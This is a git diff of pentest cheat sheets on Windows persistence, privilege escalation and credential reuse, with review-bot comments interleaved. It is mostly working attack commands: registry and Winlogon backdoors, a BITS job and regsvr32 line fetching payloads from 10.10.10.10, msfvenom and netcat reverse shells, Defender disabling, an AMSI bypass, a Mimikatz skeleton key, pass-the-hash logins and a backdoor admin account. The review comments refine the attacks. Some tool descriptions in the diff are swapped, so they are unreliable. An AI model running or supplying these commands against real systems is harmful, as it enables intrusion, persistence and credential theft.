Run tscon.exe as the SYSTEM user, you can connect to any session without a password. ```powershell @@ -125,6 +128,8 @@ net start sesshijack ``` + + ## Mimikatz - Credential Manager & DPAPI ```powershell 
@@ -141,6 +146,21 @@ $ mimikatz !sekurlsa::dpapi $ mimikatz dpapi::cred /in:C:\Users\\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b ``` +Task Scheduled credentials + +```powershell +mimikatz(commandline) # vault::cred /patch +TargetName : Domain:batch=TaskScheduler:Task:{CF3ABC3E-4B17-ABCD-0003-A1BA192CDD0B} / +UserName : DOMAIN\user +Comment : +Type : 2 - domain_password +Persist : 2 - local_machine +Flags : 00004004 +Credential : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +Attributes : 0 +``` + + ## Mimikatz - Commands list | Command |Definition| diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 5f0b5ac..c1fc028 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -6,17 +6,26 @@ * [Disable Windows Defender](#disable-windows-defender) * [Disable Windows Firewall](#disable-windows-firewall) * [Userland](#userland) - * [Registry](#registry) + * [Registry HKCU](#registry-hkcu) * [Startup](#startup) * [Scheduled Task](#scheduled-task) + * [BITS Jobs](#bits-jobs) * [Serviceland](#serviceland) * [IIS](#iis) * [Windows Service](#windows-service) * [Elevated](#elevated) - * [HKLM](#hklm) + * [Registry HKLM](#registry-hklm) + * [Winlogon Helper DLL](#) + * [GlobalFlag](#) * [Services](#services) * [Scheduled Task](#scheduled-task) + * [Binary Replacement](#binary-replacement) + * [Binary Replacement on Windows XP+](#binary-replacement-on-windows-xp) + * [Binary Replacement on Windows 10+](#binary-replacement-on-windows-10) * [RDP Backdoor](#rdp-backdoor) + * [utilman.exe](#utilman.exe) + * [sethc.exe](#sethc.exe) + * [Skeleton Key](#skeleton-key) * [References](#references) 
@@ -59,6 +68,15 @@ Value name: Backdoor Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe ``` +Using the command line + +```powershell +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" +``` + Using SharPersist ```powershell @@ -104,6 +122,23 @@ SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly ``` + +### BITS Jobs + +```powershell +bitsadmin /create backdoor +bitsadmin /addfile backdoor "http://10.10.10.10/evil.exe" "C:\tmp\evil.exe" + +# v1 +bitsadmin /SetNotifyCmdLine backdoor C:\tmp\evil.exe NUL +bitsadmin /SetMinRetryDelay "backdoor" 60 +bitsadmin /resume backdoor + +# v2 - exploit/multi/script/web_delivery +bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.10:8080/FHXSd9.sct scrobj.dll" +bitsadmin /resume backdoor +``` + ## Serviceland ### IIS @@ -126,7 +161,7 @@ SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Som ## Elevated -### HKLM +### Registry HKLM Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows. 
@@ -135,6 +170,41 @@ Value name: Backdoor Value data: C:\Windows\Temp\backdoor.exe ``` +Using the command line + +```powershell +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" +``` + +#### Winlogon Helper DLL + +> Run executable during Windows logon + +```powershell +msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > evilbinary.exe +msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > evilbinary.dll + +reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, evilbinary.exe" /f +reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, evilbinary.exe" /f +Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, evilbinary.exe" -Force +Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, evilbinary.exe" -Force +``` + + +#### GlobalFlag + +> Run executable after notepad is killed + +```powershell +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe" +``` + + ### Services Create a service that will start automatically or on-demand. 
@@ -156,6 +226,29 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S PS C:\> Register-ScheduledTask Backdoor -InputObject $D ``` +### Binary Replacement + +#### Binary Replacement on Windows XP+ + +| Feature | Executable | +|---------------------|---------------------------------------| +| Sticky Keys | C:\Windows\System32\sethc.exe | +| Accessibility Menu | C:\Windows\System32\utilman.exe | +| On-Screen Keyboard | C:\Windows\System32\osk.exe | +| Magnifier | C:\Windows\System32\Magnify.exe | +| Narrator | C:\Windows\System32\Narrator.exe | +| Display Switcher | C:\Windows\System32\DisplaySwitch.exe | +| App Switcher | C:\Windows\System32\AtBroker.exe | + +In Metasploit : `use post/windows/manage/sticky_keys` + +#### Binary Replacement on Windows 10+ + +Exploit a DLL hijacking vulnerability in the On-Screen Keyboard **osk.exe** executable. + +Create a malicious **HID.dll** in `C:\Program Files\Common Files\microsoft shared\ink\HID.dll`. + + ### RDP Backdoor #### utilman.exe 
@@ -174,10 +267,25 @@ Hit F5 a bunch of times when you are at the RDP login screen. REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f ``` +### Skeleton Key + +```powershell +# Exploitation Command runned as DA: +Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName + +# Access using the password "mimikatz" +Enter-PSSession -ComputerName -Credential \Administrator +``` ## References * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) * [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo) -* [](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/) \ No newline at end of file +* [IIS Raid – Backdooring IIS Using Native Modules - 19/02/2020](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/) +* [Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html) +* [Persistence - Checklist - @netbiosX](https://github.com/netbiosX/Checklists/blob/master/Persistence.md) +* [Persistence – Winlogon Helper DLL - @netbiosX](https://pentestlab.blog/2020/01/14/persistence-winlogon-helper-dll/) +* [Persistence - BITS Jobs - @netbiosX](https://pentestlab.blog/2019/10/30/persistence-bits-jobs/) +* [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) +* [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/) \ No newline at end of file 
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 2b67480..7f77e38 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -6,13 +6,17 @@ * [Windows Version and Configuration](#windows-version-and-configuration) * [User Enumeration](#user-enumeration) * [Network Enumeration](#network-enumeration) -* [AppLocker Enumeration](#applocker-enumeration) +* [Antivirus & Detections](#antivirus--detections) + * [Windows Defender](#windows-defender) + * [AppLocker Enumeration](#applocker-enumeration) + * [Powershell](#powershell) + * [Default Writeable Folders](#default-writeable-folders) * [EoP - Looting for passwords](#eop---looting-for-passwords) * [SAM and SYSTEM files](#sam-and-system-files) * [Search for file contents](#search-for-file-contents) * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename) * [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords) - * [Passwords in unattend.xml](#passwords-in-unattend.xml) + * [Passwords in unattend.xml](#passwords-in-unattendxml) * [Wifi passwords](#wifi-passwords) * [Passwords stored in services](#passwords-stored-in-services) * [Powershell history](#powershell-history) 
@@ -24,10 +28,13 @@ * [EoP - Kernel Exploitation](#eop---kernel-exploitation) * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [EoP - Insecure GUI apps](#eop---insecure-gui-apps) +* [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers) * [EoP - Runas](#eop---runas) +* [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies) * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system) * [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts) * [EoP - Impersonation Privileges](#eop---impersonation-privileges) + * [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges) * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives) * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation) * [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges) @@ -62,6 +69,11 @@ - [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits) - [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum) - [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt) + ```powershell + Seatbelt.exe -group=all -full + Seatbelt.exe -group=system -outputfile="C:\Temp\system.txt" + Seatbelt.exe -group=remote -computername=dc.theshire.local -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\"" + ``` - [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless) - [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS) ```powershell 
@@ -221,11 +233,55 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse ``` -## AppLocker Enumeration +## Antivirus & Detections + +### Windows Defender + +```powershell +# check status of Defender +PS C:\> Get-MpComputerStatus + +# disable Real Time Monitoring +PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus +``` + +### AppLocker Enumeration - With the GPO - HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script). +List AppLocker rules + +```powershell +PS C:\> $a = Get-ApplockerPolicy -effective +PS C:\> $a.rulecollections +``` + +### Powershell + +Default powershell locations in a Windows system. + +```powershell +C:\windows\syswow64\windowspowershell\v1.0\powershell +C:\Windows\System32\WindowsPowerShell\v1.0\powershell +``` + +Example of AMSI Bypass. + +```powershell +PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) +``` + + +### Default Writeable Folders + +```powershell +C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys +C:\Windows\System32\spool\drivers\color +C:\Windows\Tasks +C:\windows\tracing +``` + ## EoP - Looting for passwords ### SAM and SYSTEM files @@ -416,6 +472,7 @@ tasklist /v net start sc query Get-Service +Get-Process Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize ``` 
@@ -519,9 +576,9 @@ Prerequisite: Service account ```powershell PS C:\Windows\system32> sc.exe stop UsoSvc -PS C:\Windows\system32> sc.exe config UsoSvc binPath="cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\a.txt" PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe" PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe" +PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe" PS C:\Windows\system32> sc.exe qc usosvc [SC] QueryServiceConfig SUCCESS @@ -687,6 +744,26 @@ Application running as SYSTEM allowing an user to spawn a CMD, or browse directo Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt" +## EoP - Evaluating Vulnerable Drivers +Look for vuln drivers loaded, we often don't spend enough time looking at this: + +```powershell +PS C:\Users\Swissky> driverquery.exe /fo table + +Module Name Display Name Driver Type Link Date +============ ====================== ============= ====================== +1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM +3ware 3ware Kernel 5/18/2015 6:28:03 PM +ACPI Microsoft ACPI Driver Kernel 12/9/1975 6:17:08 AM +AcpiDev ACPI Devices driver Kernel 12/7/1993 6:22:19 AM +acpiex Microsoft ACPIEx Drive Kernel 3/1/2087 8:53:50 AM +acpipagr ACPI Processor Aggrega Kernel 1/24/2081 8:36:36 AM +AcpiPmi ACPI Power Meter Drive Kernel 11/19/2006 9:20:15 PM +acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM +ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM + +``` + ## EoP - Runas Use the `cmdkey` to list the stored credentials on the machine. 
@@ -712,12 +789,27 @@ C:\Windows\System32\runas.exe /env /noprofile /user: "c:\us ``` ```powershell -$ secpasswd = ConvertTo-SecureString "" -AsPlainText -Force -$ mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd) -$ computer = "" +$secpasswd = ConvertTo-SecureString "" -AsPlainText -Force +$mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd) +$computer = "" [System.Diagnostics.Process]::Start("C:\users\public\nc.exe"," 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) ``` +## EoP - Abusing Shadow Copies + +If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation. + +```powershell +# List shadow copies using vssadmin (Needs Admnistrator Access) +vssadmin list shadows + +# List shadow copies using diskshadow +diskshadow list shadows all + +# Make a symlink to the shadow copy and access it +mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ +``` + ## EoP - From local administrator to NT SYSTEM ```powershell @@ -758,6 +850,37 @@ Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary bel |`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`
2. `icalcs.exe "%windir%\system32" /grant "%username%":F`
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U| Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | |`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.

To be verified. || +### Restore A Service Account's Privileges + +> This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only. + +```powershell +# https://github.com/itm4n/FullPowers + +c:\TOOLS>FullPowers +[+] Started dummy thread with id 9976 +[+] Successfully created scheduled task. +[+] Got new token! Privilege count: 7 +[+] CreateProcessAsUser() OK +Microsoft Windows [Version 10.0.19041.84] +(c) 2019 Microsoft Corporation. All rights reserved. + +C:\WINDOWS\system32>whoami /priv +PRIVILEGES INFORMATION +---------------------- +Privilege Name Description State +============================= ========================================= ======= +SeAssignPrimaryTokenPrivilege Replace a process level token Enabled +SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled +SeAuditPrivilege Generate security audits Enabled +SeChangeNotifyPrivilege Bypass traverse checking Enabled +SeImpersonatePrivilege Impersonate a client after authentication Enabled +SeCreateGlobalPrivilege Create global objects Enabled +SeIncreaseWorkingSetPrivilege Increase a process working set Enabled + +c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z +``` + ### Meterpreter getsystem and alternatives @@ -794,7 +917,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n ### Juicy Potato (abusing the golden privileges) Binary available at : https://github.com/ohpe/juicy-potato/releases -:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809. +:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809 +. 1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication) 
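Review bot: the `EoP - Abusing Shadow Copies` section mislabels what the technique buys you: with local administrator already in hand, listing and mounting a shadow copy is not a privilege escalation but a way to read files that are locked on the live volume (`SAM`, `SYSTEM`, `SECURITY`, `NTDS.dit` on a domain controller) through the `\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\` path, which then yields hashes. Suggest rewording the intro accordingly, fixing the "Admnistrator" typo in the comment, and noting that `diskshadow` is interactive, so `list shadows all` is typed at its prompt (or fed in with `diskshadow /s script.txt`); it is not a one-line command as written.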
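Review bot: `icalcs.exe` in the unchanged `SeTakeOwnership` row just above the new FullPowers section is a typo for `icacls.exe` and is worth fixing while this hunk touches the table. For the FullPowers block itself, the quoted note ("LOCAL SERVICE or NETWORK SERVICE only") would be clearer with the one-line reason it works, which the tool's own output already hints at: it creates a scheduled task running as the same service account, and the task's token carries the account's full default privilege set, which is what the `whoami /priv` listing shows afterward. `C:\TOOLS\nc64.exe 1.2.3.4 1337` in the last line is a placeholder and should be flagged as one.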
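Review bot: the Juicy Potato hunk replaces the trailing `.` of the warning with a new line containing only `+.`, which renders as a stray period on its own line; drop that line and keep the sentence ending on the `1809` line. If the intent was to add more text after `1809` (other affected builds, or a pointer to the newer Potato variants that do work there), that text is missing.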
@@ -979,4 +1102,4 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com * [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/) * [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS) * [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html) -* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) \ No newline at end of file +* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index cd27039..c674732 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -9,10 +9,12 @@ * [Metasploit](#metasploit) * [Metasploit - SMB](#metasploit-smb) * [Metasploit - Psexec](#metasploit-psexec) +* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials) +* [WinRM](#winrm) * [Crackmapexec](#crackmapexec) * [Winexe](#winexe) * [WMI](#wmi) -* [Psexec.py / Smbexec.py / Wmiexec.py](#psexec.py---smbexec.py---wmiexec.py) +* [Psexec.py / Smbexec.py / Wmiexec.py](#psexecpy--smbexecpy--wmiexecpy) * [PsExec - Sysinternal](#psexec-sysinternal) * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) * [Netuse](#netuse) 
@@ -23,7 +25,7 @@ ### TIP 1 - Create your credential ```powershell -net user hacker hacker1234* /add +net user hacker Hcker_12345678* /add /Y net localgroup administrators hacker /add net localgroup "Remote Desktop Users" hacker /add # RDP access net localgroup "Backup Operators" hacker /add # Full access to files 
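Review bot: the `/Y` added to `net user hacker Hcker_12345678* /add /Y` is there because the new password is longer than 14 characters, which makes `net user` prompt "Do you want to continue this operation?"; without `/Y` the command hangs in a non-interactive shell. Worth a trailing comment such as `# /Y answers the >14-character password prompt` so the flag is not dropped as noise later, and a note that the value still has to satisfy the target's password policy or `/add` fails with a policy error.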
@@ -91,40 +93,96 @@ shell ## Crackmapexec -```python -git clone https://github.com/byt3bl33d3r/CrackMapExec.github -python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password -python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami -# pass the hash -cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth +```powershell +root@payload$ git clone https://github.com/byt3bl33d3r/CrackMapExec.github +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -x 'whoami' # cmd +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -X 'whoami' # powershell +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method atexec -x 'whoami' +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method wmiexec -x 'whoami' +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -x 'whoami' +``` + +## Remote Code Execution with PS Credentials + +```powershell +PS C:\> $SecPassword = ConvertTo-SecureString 'secretpassword' -AsPlainText -Force +PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword) +PS C:\> Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock {whoami} +``` + +## WinRM + +Require: +* Port **5985** or **5986** open. +* Default endpoint is **/wsman** + +```powershell +root@payload$ git clone https://github.com/Hackplayers/evil-winrm +root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] +root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' 
-s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' +``` + +or using a custom ruby code to interact with the WinRM service. + +```ruby +require 'winrm' + +conn = WinRM::Connection.new( + endpoint: 'http://ip:5985/wsman', + user: 'domain/user', + password: 'password', +) + +command="" +conn.shell(:powershell) do |shell| + until command == "exit\n" do + print "PS > " + command = gets + output = shell.run(command) do |stdout, stderr| + STDOUT.print stdout + STDERR.print stderr + end + end + puts "Exiting with code #{output.exitcode}" +end ``` ## Winexe Integrated to Kali -```python -winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe +```powershell +root@payload$ winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe ``` ## WMI ```powershell -wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe” +PS C:\> wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe” ``` ## Psexec.py / Smbexec.py / Wmiexec.py from Impacket -```python -git clone https://github.com/CoreSecurity/impacket.git -python psexec.py DOMAIN/username:password@10.10.10.10 -python smbexec.py DOMAIN/username:password@10.10.10.10 -python wmiexec.py DOMAIN/username:password@10.10.10.10 +```powershell +root@payload$ git clone https://github.com/CoreSecurity/impacket.git -# psexec.exe -s cmd -# switch admin user to NT Authority/System +# PSEXEC like functionality example using RemComSv +root@payload$ python psexec.py DOMAIN/username:password@10.10.10.10 +# this will drop a binary on the disk = noisy + +# A similar approach to PSEXEC w/o using RemComSvc +root@payload$ python smbexec.py DOMAIN/username:password@10.10.10.10 + +# A semi-interactive shell, used through Windows Management Instrumentation. +root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10 + +# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. 
+root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10 + +# Executes a command on the target machine through the Task Scheduler service and returns the output of the executed command. +root@payload$ python dcomexec.py DOMAIN/username:password@10.10.10.10 ``` ## PsExec - Sysinternal @@ -132,8 +190,10 @@ python wmiexec.py DOMAIN/username:password@10.10.10.10 from Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) ```powershell -PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell +PS C:\> PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe + +# switch admin user to NT Authority/System +PS C:\> PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s ``` ## RDP Remote Desktop Protocol @@ -141,14 +201,14 @@ PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP) ```powershell -SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password +PS C:\> SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password ``` Or connect remotely with `rdesktop` ```powershell -rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare -rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10 +root@payload$ rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare +root@payload$ rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10 # -g : the screen will take up 70% of your actual screen size # -r disk:share : sharing a local folder during a remote desktop session ``` 
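Review bot: the two new Impacket descriptions at the end of the block are swapped: `atexec.py` is the one that executes a command through the Task Scheduler service and returns its output, and `dcomexec.py` is the semi-interactive shell similar to `wmiexec.py` that uses different DCOM endpoints (ShellWindows, ShellBrowserWindow, MMC20). Swap the two comment lines. Two smaller points in the same hunk: the clone URL `https://github.com/byt3bl33d3r/CrackMapExec.github` is a typo for `.git` carried over from the removed line, and the evil-winrm example switches from `evil-winrm` to `evil-winrm.rb` between two consecutive lines; pick one spelling.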
@@ -156,35 +216,35 @@ rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10 Note: you may need to enable it with the following command ```powershell -reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f -netsh firewall set service remoteadmin enable -netsh firewall set service remotedesktop enable +PS C:\> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f +PS C:\> netsh firewall set service remoteadmin enable +PS C:\> netsh firewall set service remotedesktop enable ``` or with psexec(sysinternals) ```powershell -psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 +PS C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 ``` or with crackmapexec ```powershell -crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable +root@payload$ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable ``` or with Metasploit ```powershell -run getgui -u admin -p 1234 +root@payload$ run getgui -u admin -p 1234 ``` or with xfreerdp ```powershell -xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+ -xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group. 
